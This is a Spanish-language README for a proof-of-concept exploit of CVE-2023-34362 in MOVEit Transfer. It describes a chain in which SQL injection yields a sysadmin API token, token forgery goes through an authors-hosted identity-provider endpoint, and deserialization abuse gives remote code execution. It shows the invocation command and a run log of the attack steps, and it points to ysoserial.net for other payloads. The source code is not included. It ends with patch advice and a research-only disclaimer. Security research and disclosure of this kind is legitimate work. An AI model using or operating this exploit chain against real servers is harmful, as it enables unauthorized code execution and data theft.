
POC para CVE-2023-34362 que afecta a MOVEit Transfer
POC para CVE-2023-34362 que afecta a MOVEit Transfer
Un análisis técnico de causa raíz de la vulnerabilidad se puede encontrar en el blog:
Este POC explota una inyección SQL para obtener un token de acceso de API de sysadmin y luego utiliza ese acceso para abusar de una llamada de deserialización y obtener ejecución remota de código.
Este POC necesita contactar con un endpoint de un Proveedor de Identidad que aloje certificados RS256 adecuados utilizados para falsificar tokens de usuario arbitrarios; por defecto, este POC utiliza nuestro endpoint IDP alojado en AWS.
El exploit escribirá por defecto un archivo en C:\Windows\Temp\message.txt. Se pueden generar payloads alternativos utilizando el proyecto ysoserial.net.
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se hacen responsables del mal uso del software. Úselo con responsabilidad.